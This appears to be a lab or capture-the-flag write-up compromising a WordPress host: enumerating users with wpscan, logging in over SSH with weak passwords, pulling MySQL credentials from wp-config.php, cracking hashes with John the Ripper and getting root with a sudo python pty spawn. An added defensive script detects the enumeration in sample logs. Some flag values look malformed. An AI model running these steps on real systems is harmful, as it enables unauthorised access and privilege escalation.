- Exposed Services
- Critical Vulnerabilities
- Exploitation
- nmap -sS -PO 192.168.1.*
- Name: Target 1
- IP Address: 192.168.1.110
- Nmap scan results for each machine reveal the below services and OS details:
- nmap -sV 192.168.1.110
The scan above identifies the services below as potential points of entry:
- Port 22/TCP Open SSH
- Port 80/TCP Open HTTP
- Port 111/TCP Open rpcbind
- Port 139/TCP Open netbios-ssn
- Port 445/TCP Open netbios-ssn
- The following vulnerabilities were identified on the target machine:
- WordPress user enumeration
- Weak user password
- Able to obtain the MySQL DB password and start a database session
- Unsalted password hashes (dumped from the database and cracked) gave access to the target machine and allowed escalation of user privilege to root
Command used for the WordPress user enumeration scan: wpscan --url http://192.168.1.110/wordpress --enumerate u
Vulnerability CVE-2017-5487: the scan enumerates usernames and other potentially vulnerable paths and files.
Rating: base score 5.3 (Medium)
As shown below, the scan successfully enumerated the valid usernames Steven and Michael.
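As an added example (not part of the original report), the following Python script shows how a defender could spot, in web server access logs, the two request patterns that a user-enumeration scan like the wpscan run above produces: a walk through `?author=N` ids and requests to the REST users endpoint behind CVE-2017-5487. The Apache combined-log lines, client IPs and the scanner user-agent string are constructed sample data.

```python
import re
from collections import defaultdict

# Constructed Apache "combined" access-log lines (sample data, not from a real host).
SAMPLE_LOG = """\
192.168.1.50 - - [10/Oct/2023:13:55:36 +0000] "GET /wordpress/?author=1 HTTP/1.1" 301 0 "-" "WPScan v3.8.22"
192.168.1.50 - - [10/Oct/2023:13:55:36 +0000] "GET /wordpress/?author=2 HTTP/1.1" 301 0 "-" "WPScan v3.8.22"
192.168.1.50 - - [10/Oct/2023:13:55:37 +0000] "GET /wordpress/?author=3 HTTP/1.1" 404 1234 "-" "WPScan v3.8.22"
192.168.1.50 - - [10/Oct/2023:13:55:38 +0000] "GET /wordpress/wp-json/wp/v2/users HTTP/1.1" 200 812 "-" "WPScan v3.8.22"
10.0.0.7 - - [10/Oct/2023:14:01:02 +0000] "GET /wordpress/?p=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Oct/2023:14:01:05 +0000] "GET /wordpress/?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
"""

# One combined-log line: client, identd, user, [timestamp], "request", status, bytes, "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
AUTHOR_RE = re.compile(r'[?&]author=(\d+)')          # ?author=N id walk used for username enumeration
REST_USERS_RE = re.compile(r'/wp-json/wp/v2/users')  # REST endpoint that lists users (CVE-2017-5487)

def analyze(log_text, author_threshold=3):
    """Return {client_ip: findings} for clients whose requests look like WordPress user enumeration."""
    per_ip = defaultdict(lambda: {"author_ids": set(), "rest_users": 0, "scanner_ua": False})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined-log format
        rec = per_ip[m["ip"]]
        hit = AUTHOR_RE.search(m["path"])
        if hit:
            rec["author_ids"].add(int(hit.group(1)))
        if REST_USERS_RE.search(m["path"]):
            rec["rest_users"] += 1
        if "wpscan" in m["ua"].lower():
            rec["scanner_ua"] = True
    # Flag a client on any of: walking several author ids, touching the users endpoint, or a scanner UA.
    return {
        ip: rec for ip, rec in per_ip.items()
        if len(rec["author_ids"]) >= author_threshold or rec["rest_users"] or rec["scanner_ua"]
    }

if __name__ == "__main__":
    for ip, rec in analyze(SAMPLE_LOG).items():
        print(f"{ip}: author ids {sorted(rec['author_ids'])}, "
              f"users endpoint hits {rec['rest_users']}, scanner UA {rec['scanner_ua']}")
```

A single `?author=1` request from an ordinary browser (the second client above) stays below the threshold, so only the client that walked several ids and hit the users endpoint is reported.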
- Weak user passwords made it possible to SSH into a user shell as Michael (image below):
- ssh michael@192.168.1.110
- PW = michael
- After logging in as Michael it was possible to traverse directories and files and find Flag One and Flag Two (images below):
- Flag1 = b9bbcb33ellb80be759c4e844862482d
- /var/www/html/service.html
- nano service.html
- Flag2 = fc3fd58dcdad9ab23faca6e9a3e581c
- /var/www/
- ls
- cat flag2.txt
- The MySQL DB password was found in the following directory and file (image below):
- /var/www/html/wp-config.php
- nano wp-config.php
- MySQL DB PW: R@v3nSecurity
- Commands used (see images below):
- mysql --user=root --password=R@v3nSecurity
- show databases;
- use wordpress;
- show tables;
- select * from wp_users;
- select * from wp_posts;
- Flag3 Found = afc01ab56b50591e7dccf93122770cd2
- Using the commands above, the password hash for Steven was found and dumped
- Created a file on the Kali attack machine for the password hashes
- Command used: touch wp_hashes.txt
- nano wp_hashes.txt and added the hashes
- Using John the Ripper, obtained Steven's password
- Command: john wp_hashes.txt
- PW = pink84
- Logged in using Steven's credentials
- ssh steven@192.168.1.110
- PW = pink84
- Escalated to root: first listed the sudo permissions with sudo -l
- Python could be run with sudo, so it was used to spawn a root shell on the target machine
- sudo python -c 'import pty;pty.spawn("/bin/bash")'
- Traversed the directory and found Flag 4
- Flag4 = 715dea6c055b9fe3337544932f2941ce
- cat flag4.txt